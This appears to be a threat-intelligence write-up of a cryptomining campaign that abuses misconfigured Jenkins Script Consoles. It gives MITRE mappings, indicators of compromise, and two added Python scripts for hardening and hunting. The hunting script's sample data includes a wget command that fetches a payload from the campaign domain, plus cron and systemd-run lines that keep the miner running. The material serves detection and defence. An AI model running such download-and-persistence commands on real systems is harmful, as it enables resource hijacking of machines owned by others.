Attackers can weaponize the Jenkins Script Console to execute malicious Groovy scripts, enabling cryptomining and backdoors when Jenkins is misconfigured. The analysis explains how an exposed /script endpoint (the result of improperly set up authentication) allows RCE, followed by a multi-stage mining payload deployment with persistence via cron and systemd-run. #Jenkins #ScriptConsole #Groovy #cryptomining #BusyBox #berrystore.me #systemd-run #cron
Keypoints
- Attackers can weaponize Jenkins Script Console to run malicious Groovy scripts for cryptomining.
- Misconfigurations exposing the /script endpoint enable remote code execution and misuse by attackers.
- The mining operation and persistence chain start from a Base64-encoded payload executed via Groovy scripts.
- The script first checks whether it is running under BusyBox (and exits if it is), then searches for a directory where the current user can both write and execute, starting with /dev/shm and skipping /proc and /sys.
- If no suitable location is found, the script falls back to /tmp, creating a duet subdirectory with mode 777 for its operations.
- The miner is fetched over HTTPS either with wget or with openssl s_client as a hand-rolled HTTPS client, then AES-256 decrypted and extracted with tar.
- Persistence is achieved with a cron job and a systemd-run timer; flock on a lock file ensures that only one miner instance runs at a time.
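The staging step above (probing /dev/shm, then falling back to /tmp, for a directory that is both writable and executable) only succeeds where scratch filesystems allow execution. The following Python check is an added example, not code from the original analysis or the payload; it parses /proc/mounts-style text and reports which of the probed scratch locations are mounted without noexec. The mounts listing and the PROBED_DIRS tuple are constructed for illustration; the real payload's directory search is described on this page only in outline.

```python
"""Report scratch directories that still allow execution (added example)."""
from __future__ import annotations

# Locations the analysed payload is described as probing for a place to drop
# and run the miner: /dev/shm first, /tmp (with a 777 'duet' subdirectory) as
# the fallback. /var/tmp is added here as an assumption, since it is the usual
# third candidate on Linux hosts.
PROBED_DIRS = ("/dev/shm", "/tmp", "/var/tmp")


def parse_mounts(mounts_text: str) -> dict[str, set[str]]:
    """Map mount point -> set of mount options from /proc/mounts content."""
    mounts: dict[str, set[str]] = {}
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # blank or truncated line
        # /proc/mounts escapes spaces in paths as \040
        mount_point = fields[1].replace("\\040", " ")
        mounts[mount_point] = set(fields[3].split(","))
    return mounts


def governing_mount(path: str, mounts: dict[str, set[str]]) -> str:
    """Longest mount point that is a prefix of path; its options apply."""
    best = "/"
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if len(mp) > len(best):
                best = mp
    return best


def exec_capable_scratch_dirs(mounts_text: str, probed=PROBED_DIRS) -> list[str]:
    """Return the probed dirs whose governing mount lacks the noexec option."""
    mounts = parse_mounts(mounts_text)
    result = []
    for d in probed:
        opts = mounts.get(governing_mount(d, mounts), set())
        if "noexec" not in opts:
            result.append(d)
    return result


# Constructed sample: /dev/shm hardened with noexec, /tmp a tmpfs without it,
# /var/tmp living on the root filesystem.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
"""

if __name__ == "__main__":
    import pathlib

    mounts_file = pathlib.Path("/proc/mounts")
    text = mounts_file.read_text() if mounts_file.exists() else SAMPLE_MOUNTS
    for d in exec_capable_scratch_dirs(text):
        print(f"{d}: mounted without noexec, usable for staging a binary")
```

Mounting /tmp, /var/tmp and /dev/shm with noexec removes the easy path this payload relies on, but it is a speed bump rather than a wall: a binary on a noexec filesystem can still be started through the dynamic loader or an interpreter, so treat the check as one layer alongside the cron and systemd-run hunting described later on this page.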
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers exploit misconfigured public-facing interface to gain RCE. ‘Misconfigurations such as improperly setup authentication mechanisms expose the /script endpoint to attackers. This can lead to remote code execution (RCE).’
- [T1057] Process Discovery – The script checks whether it is running under BusyBox and exits if it is. ‘First, this script checks whether it is running BusyBox, which if detected, will exit from the script:’
- [T1083] File and Directory Discovery – Attacker searches for writable/executable locations to host the miner. ‘Next, the attacker searches for locations where the miner can be downloaded and executed. First, it checks if the current user can write and execute the miner under the /dev/shm directory using the svalid() function; if the function returns a non-zero exit status (indicating the directory is not writable and executable), it then searches for other directories except /proc and /sys.’
- [T1222.002] File and Directory Permissions Modification – Creates a directory with broad permissions to host the miner. ‘…creates a sub directory named duet, assigning it maximum permissions (777).’
- [T1140] Deobfuscate/Decode Files or Information – Decodes a Base64-encoded string that is a malicious script. ‘the Base64-encoded string, which is actually a malicious script.’
- [T1105] Ingress Tool Transfer – Downloads the miner binary from external sources. ‘downloads the cryptominer binary… It uses wget to download the binary.’
- [T1071.001] Application Layer Protocol: Web Protocols – Transfers data over HTTPS/TLS to fetch payload. ‘This command sends an HTTPS GET request to the server, then retrieves the server’s response…’
- [T1053.003] Cron – Uses a cron job for persistence, with flock on a lock file so that duplicate miner instances are not started. ‘It uses the flock system utility to lock the file, and the /var/tmp/verl.lock file to ensure that only one instance is running at a time’
- [T1053.006] Systemd Timers – Uses systemd-run to schedule miner execution. ‘The systemd-run command uses … to schedule the execution of a cryptocurrency mining application at the beginning of every hour.’
- [T1496] Resource Hijacking – The end goal is cryptocurrency mining. ‘to harvest cryptocurrencies’ (cryptomining).
Indicators of Compromise
- [Domain] berrystore.me – Domain used to host the encrypted miner payload. ‘from https://berrystore.me’ referenced as the source of the tar payload.
- [File] cex – Miner binary; checked for presence and later executed. ‘The miner binary… cex file name’.
- [File] vinars – Temporary shell script created during execution. ‘creates a temporary shell script named vinars in the specified directory.’
- [Directory] /dev/shm – Writable directory checked for mining operations. ‘the current user can write and execute the miner under the /dev/shm directory’.
- [Directory] /tmp – fallback operational directory with a subdirectory named duet set to 777. ‘uses /tmp for operations and creates a sub directory named duet, assigning it maximum permissions (777).’
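To turn the persistence details (cron job guarded by flock, systemd-run scheduled at the top of every hour) and the indicators listed above into a host check, here is an added Python hunting example. It is not code from the original article or from the payload it analyses. It scans crontab-style lines and process command lines for the described pattern and for the IoC strings on this page; the sample lines are constructed, and the hourly systemd-run calendar spec is an assumption about how "at the beginning of every hour" would be expressed.

```python
"""Hunt for the cron/systemd-run persistence chain and IoCs (added example)."""
import re

# Artifacts named in the analysis; any mention is worth a closer look.
IOC_STRINGS = ("berrystore.me", "/var/tmp/verl.lock", "/tmp/duet", "vinars", "/dev/shm")
IOC_BINARIES = ("cex",)

# flock followed (before any command separator) by a *.lock path argument
FLOCK_RE = re.compile(r"\bflock\b[^;&|]*?(?P<lock>\S+\.lock)")
# systemd-run --on-calendar with an hourly spec ('hourly' or a '*:00' form);
# the exact spec used by the payload is not quoted on this page (assumption)
SYSTEMD_HOURLY_RE = re.compile(
    r"\bsystemd-run\b.*--on-calendar[= ]['\"]?(hourly|\*-\*-\* \*:00(?::00)?|\*:00)"
)
# crontab with minute field 0 and hour field * runs at the top of every hour
CRON_HOURLY_RE = re.compile(r"^\s*0\s+\*\s+\*\s+\*\s+\*\s+")


def scan_line(line: str) -> list[str]:
    """Return human-readable findings for a single crontab or command line."""
    findings = []
    m = FLOCK_RE.search(line)
    if m:
        findings.append(f"flock-guarded job using {m.group('lock')}")
    if CRON_HOURLY_RE.match(line):
        findings.append("cron entry scheduled at the top of every hour")
    if SYSTEMD_HOURLY_RE.search(line):
        findings.append("systemd-run transient timer running hourly")
    for ioc in IOC_STRINGS:
        if ioc in line:
            findings.append(f"IoC string {ioc}")
    for name in IOC_BINARIES:
        # match only as a whole path component or token, not as a substring
        if re.search(rf"(^|[\s/]){re.escape(name)}(\s|$)", line):
            findings.append(f"IoC binary {name}")
    return findings


def hunt(lines) -> dict[int, list[str]]:
    """Map line index -> findings, for every line with at least one hit."""
    hits = {}
    for i, line in enumerate(lines):
        found = scan_line(line)
        if found:
            hits[i] = found
    return hits


# Constructed samples (not captured from a real host): two crontab entries and
# three process command lines, of which one is a benign daemon.
SAMPLE_CRONTAB = [
    "0 * * * * flock -n /var/tmp/verl.lock /tmp/duet/cex >/dev/null 2>&1",
    "30 2 * * 1 /usr/local/bin/backup.sh",
]
SAMPLE_PROCESSES = [
    "systemd-run --on-calendar=hourly /tmp/duet/cex",
    "/usr/sbin/sshd -D",
    "wget -q -O /dev/shm/vinars https://berrystore.me",
]

if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_CRONTAB + SAMPLE_PROCESSES).items():
        print(idx, "; ".join(found))
```

On a live host feed it `crontab -l` output for every user plus /etc/cron.d, and the command lines from `ps -eo args` and `systemctl list-timers --all`. The IoC strings are the weakest part of the check, since a lock-file name or staging directory is trivially changed; the behavioural signals (a cron or transient timer that runs an executable from a world-writable scratch directory under flock) survive renaming and deserve the alert.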